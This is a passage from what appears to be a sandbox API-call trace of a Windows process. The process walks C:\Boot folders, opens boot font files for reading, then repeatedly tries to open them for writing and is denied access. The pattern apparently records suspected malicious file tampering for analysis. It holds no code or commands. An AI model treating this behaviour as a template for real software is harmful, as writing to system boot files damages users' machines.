liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.850] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.850] CloseHandle (hObject=0x418) returned 1 [0069.850] AreFileApisANSI () returned 1 [0069.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0069.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0069.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=32 | out: lpWideCharStr="C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 32 [0069.850] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.850] GetLastError () returned 0x5 [0069.850] GetLastError () returned 0x5 [0069.850] SetLastError (dwErrCode=0x5) [0069.850] GetLastError () returned 0x5 [0069.850] SetLastError (dwErrCode=0x5) [0069.851] GetLastError () returned 0x5 [0069.851] SetLastError (dwErrCode=0x5) [0069.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0069.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0069.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.851] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef98c419, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x150a2, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="segoe_slboot.ttf", cAlternateFileName="SEGOE_~1.TTF")) returned 1 [0069.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0069.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0069.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0069.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0069.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0069.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0069.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0069.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0069.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0069.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0069.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0069.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0069.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0069.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0069.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0069.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0069.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0069.852] AreFileApisANSI () returned 1 [0069.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\segoe_slboot.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\segoe_slboot.ttf", lpUsedDefaultChar=0x0) returned 31 [0069.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0069.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0069.852] AreFileApisANSI () returned 1 [0069.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0069.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53838 [0069.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=31 | out: lpWideCharStr="C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 31 [0069.852] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.852] GetFileType (hFile=0x418) returned 0x1 [0069.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.853] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.853] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.853] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.853] CloseHandle (hObject=0x418) returned 1 [0069.853] AreFileApisANSI () returned 1 [0069.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0069.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x534d8 [0069.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=31 | out: lpWideCharStr="C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 31 [0069.853] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.854] GetLastError () returned 0x5 [0069.854] GetLastError () returned 0x5 [0069.854] SetLastError (dwErrCode=0x5) [0069.854] GetLastError () returned 0x5 [0069.854] SetLastError (dwErrCode=0x5) [0069.854] GetLastError () returned 0x5 [0069.854] SetLastError (dwErrCode=0x5) [0069.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0069.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0069.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.854] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef999ae4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xbfc3, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0069.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0069.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0069.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0069.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0069.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0069.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0069.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0069.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0069.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.855] AreFileApisANSI () returned 1 [0069.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\wgl4_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\wgl4_boot.ttf", lpUsedDefaultChar=0x0) returned 28 [0069.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0069.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0069.855] AreFileApisANSI () returned 1 [0069.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0069.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x77fd0 [0069.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x77fd0, cchWideChar=28 | out: lpWideCharStr="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 28 [0069.855] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.855] GetFileType (hFile=0x418) returned 0x1 [0069.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x77fd0 | out: hHeap=0x20000) returned 1 [0069.856] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.856] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.856] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.856] CloseHandle (hObject=0x418) returned 1 [0069.856] AreFileApisANSI () returned 1 [0069.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0069.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x78250 [0069.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x78250, cchWideChar=28 | out: lpWideCharStr="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 28 [0069.856] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.856] GetLastError () returned 0x5 [0069.856] GetLastError () returned 0x5 [0069.856] SetLastError (dwErrCode=0x5) [0069.857] GetLastError () returned 0x5 [0069.857] SetLastError (dwErrCode=0x5) [0069.857] GetLastError () returned 0x5 [0069.857] SetLastError (dwErrCode=0x5) [0069.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78250 | out: hHeap=0x20000) returned 1 [0069.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0069.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.857] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.857] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.857] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x36, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x536d8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x36, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓뿃")) returned 0 [0069.857] FindClose (in: hFindFile=0x783d0 | out: hFindFile=0x783d0) returned 1 [0069.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0069.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0069.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0069.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0069.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.858] AreFileApisANSI () returned 1 [0069.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\fr-CA", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\fr-CA", lpUsedDefaultChar=0x0) returned 14 [0069.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0069.858] AreFileApisANSI () returned 1 [0069.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88680 [0069.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88680, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\fr-CA") returned 14 [0069.858] CreateFileW (lpFileName="C:\\Boot\\fr-CA" (normalized: "c:\\boot\\fr-ca"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.858] GetLastError () returned 0x5 [0069.858] GetLastError () returned 0x5 [0069.858] SetLastError (dwErrCode=0x5) [0069.858] GetLastError () returned 0x5 [0069.858] SetLastError (dwErrCode=0x5) [0069.858] GetLastError () returned 0x5 [0069.858] SetLastError (dwErrCode=0x5) [0069.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.966] AreFileApisANSI () returned 1 [0069.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0069.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\fr-CA") returned 14 [0069.966] CreateFileW (lpFileName="C:\\Boot\\fr-CA" (normalized: "c:\\boot\\fr-ca"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.969] GetLastError () returned 0x5 [0069.969] GetLastError () returned 0x5 [0069.969] SetLastError (dwErrCode=0x5) [0069.969] GetLastError () returned 0x5 [0069.969] SetLastError (dwErrCode=0x5) [0069.969] GetLastError () returned 0x5 [0069.969] SetLastError (dwErrCode=0x5) [0069.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: 